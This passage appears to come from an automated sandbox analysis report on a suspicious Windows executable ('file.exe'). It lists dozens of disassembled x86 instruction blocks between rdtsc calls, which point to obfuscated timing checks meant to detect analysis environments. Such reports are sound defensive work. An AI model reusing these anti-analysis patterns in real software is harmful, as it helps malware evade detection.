add dword ptr [esp+04h], 00000016h 0x0000006e inc edx 0x0000006f push edx 0x00000070 ret 0x00000071 pop edx 0x00000072 ret 0x00000073 nop 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12265C1 second address: 12265CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F76D8D60506h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122233C second address: 122234F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jl 00007F76D9274FF6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CA62 second address: 122CA67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12255FF second address: 122561E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D9275003h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221448 second address: 122144E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122561E second address: 1225624 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222453 second address: 1222457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122144E second address: 1221460 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D9274FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222457 second address: 122245B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221460 second address: 1221464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221464 second address: 122147E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60512h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122245B second address: 1222468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222468 second address: 122246C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D32F6 second address: 11D3302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F76D9274FF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D3302 second address: 11D3307 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1229421 second address: 1229426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A539 second address: 122A547 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CCC8 second address: 122CCCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1229426 second address: 122943D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D60513h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A547 second address: 122A54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A54B second address: 122A54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1229514 second address: 1229519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122850E second address: 122851C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1229519 second address: 1229553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9275005h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F76D9275009h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122851C second address: 122852D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 js 00007F76D8D6050Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122F86E second address: 122F872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D4E01 second address: 11D4E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76D8D60506h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D4E13 second address: 11D4E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D4E19 second address: 11D4E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76D8D60510h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D4E37 second address: 11D4E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1239600 second address: 1239606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1239606 second address: 123960A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123960A second address: 1239610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124022E second address: 1240264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F76D9274FFAh 0x00000013 popad 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F76D9274FFBh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1240264 second address: 1240277 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jp 00007F76D8D6050Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12404C5 second address: 12404C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12404C9 second address: 12404E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12404E5 second address: 12404F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12404F3 second address: 12404F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12463A0 second address: 12463A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12463A4 second address: 12463A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1246908 second address: 124692C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F76D9274FF6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F76D9275003h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124692C second address: 1246959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F76D8D60515h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1246F93 second address: 1246F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1246F99 second address: 1246F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247372 second address: 1247379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124A5BE second address: 124A5E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F76D8D60512h 0x00000013 jno 00007F76D8D60508h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124BB56 second address: 124BB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F76D9274FF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F76D9275000h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124BB74 second address: 124BB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F76D8D60506h 0x0000000f jns 00007F76D8D60506h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121C4A6 second address: 121C4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121C4AA second address: 11FCA72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F76D8D6050Ch 0x0000000f jne 00007F76D8D60506h 0x00000015 popad 0x00000016 push eax 0x00000017 jo 00007F76D8D6051Bh 0x0000001d jmp 00007F76D8D60515h 0x00000022 nop 0x00000023 sbb dx, D5D5h 0x00000028 lea eax, dword ptr [ebp+124911B3h] 0x0000002e pushad 0x0000002f jp 00007F76D8D60508h 0x00000035 jo 00007F76D8D60508h 0x0000003b push ecx 0x0000003c pop ebx 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007F76D8D60513h 0x00000044 mov dword ptr [esp], eax 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F76D8D60508h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000014h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov ecx, eax 0x00000063 mov edi, dword ptr [ebp+122D2C42h] 0x00000069 call dword ptr [ebp+122D3939h] 0x0000006f pushad 0x00000070 push ecx 0x00000071 push edi 0x00000072 pop edi 0x00000073 pop ecx 0x00000074 jne 00007F76D8D60508h 0x0000007a push ebx 0x0000007b push edi 0x0000007c pop edi 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CB5B second address: 121CB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9274FFBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CC46 second address: 121CC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D8D6050Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CDA4 second address: 121CDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CDA8 second address: 121CDBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CFCC second address: 121CFE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F76D9274FFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121CFE2 second address: 121D027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+1246CB08h], eax 0x0000000e push 00000004h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F76D8D60508h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D3AAEh], ecx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 je 00007F76D8D60508h 0x00000039 push edx 0x0000003a pop edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D027 second address: 121D02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D616 second address: 121D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D851 second address: 121D88F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F76D9275007h 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007F76D9274FF8h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D936 second address: 121DA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F76D8D60519h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F76D8D60508h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 movzx edi, si 0x0000002b or dword ptr [ebp+122D2E73h], ecx 0x00000031 lea eax, dword ptr [ebp+124911F7h] 0x00000037 mov cx, bx 0x0000003a call 00007F76D8D60519h 0x0000003f jmp 00007F76D8D6050Ah 0x00000044 pop ecx 0x00000045 push eax 0x00000046 pushad 0x00000047 jc 00007F76D8D6050Ch 0x0000004d jns 00007F76D8D60506h 0x00000053 push edx 0x00000054 jmp 00007F76D8D60510h 0x00000059 pop edx 0x0000005a popad 0x0000005b mov dword ptr [esp], eax 0x0000005e pushad 0x0000005f call 00007F76D8D60516h 0x00000064 cmc 0x00000065 pop edi 0x00000066 sub cx, A39Eh 0x0000006b popad 0x0000006c lea eax, dword ptr [ebp+124911B3h] 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F76D8D60515h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121DA0B second address: 11FD577 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F76D9275000h 0x0000000f nop 0x00000010 call dword ptr [ebp+122D1DB0h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD577 second address: 11FD5B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jc 00007F76D8D60506h 0x0000000f jmp 00007F76D8D60510h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 js 00007F76D8D60506h 0x0000001c jmp 00007F76D8D6050Dh 0x00000021 jng 00007F76D8D60506h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD5B3 second address: 11FD5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F1F7 second address: 124F201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F76D8D60506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F201 second address: 124F207 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F207 second address: 124F22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F76D8D60520h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F22D second address: 124F249 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F76D9275007h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F249 second address: 124F272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F76D8D6050Fh 0x00000010 pop esi 0x00000011 push edi 0x00000012 jmp 00007F76D8D6050Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F272 second address: 124F280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jo 00007F76D9274FF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F4BF second address: 124F4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F4CC second address: 124F4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F7ED second address: 124F832 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F76D8D6050Dh 0x0000000f pushad 0x00000010 jmp 00007F76D8D6050Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jo 00007F76D8D60508h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 jmp 00007F76D8D60511h 0x0000002b pop edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259C46 second address: 1259C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259C4A second address: 1259C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60512h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F76D8D60512h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259C74 second address: 1259CC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F76D9274FF6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d jno 00007F76D9274FF6h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F76D9275007h 0x0000001e ja 00007F76D9274FF6h 0x00000024 jmp 00007F76D9275006h 0x00000029 jne 00007F76D9274FF6h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259CC7 second address: 1259CCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259CCE second address: 1259CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259CD7 second address: 1259CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258936 second address: 125893A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258BE9 second address: 1258BF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258BF4 second address: 1258BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258BFC second address: 1258C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258C01 second address: 1258C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9275005h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258C1A second address: 1258C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258C1E second address: 1258C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258C24 second address: 1258C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
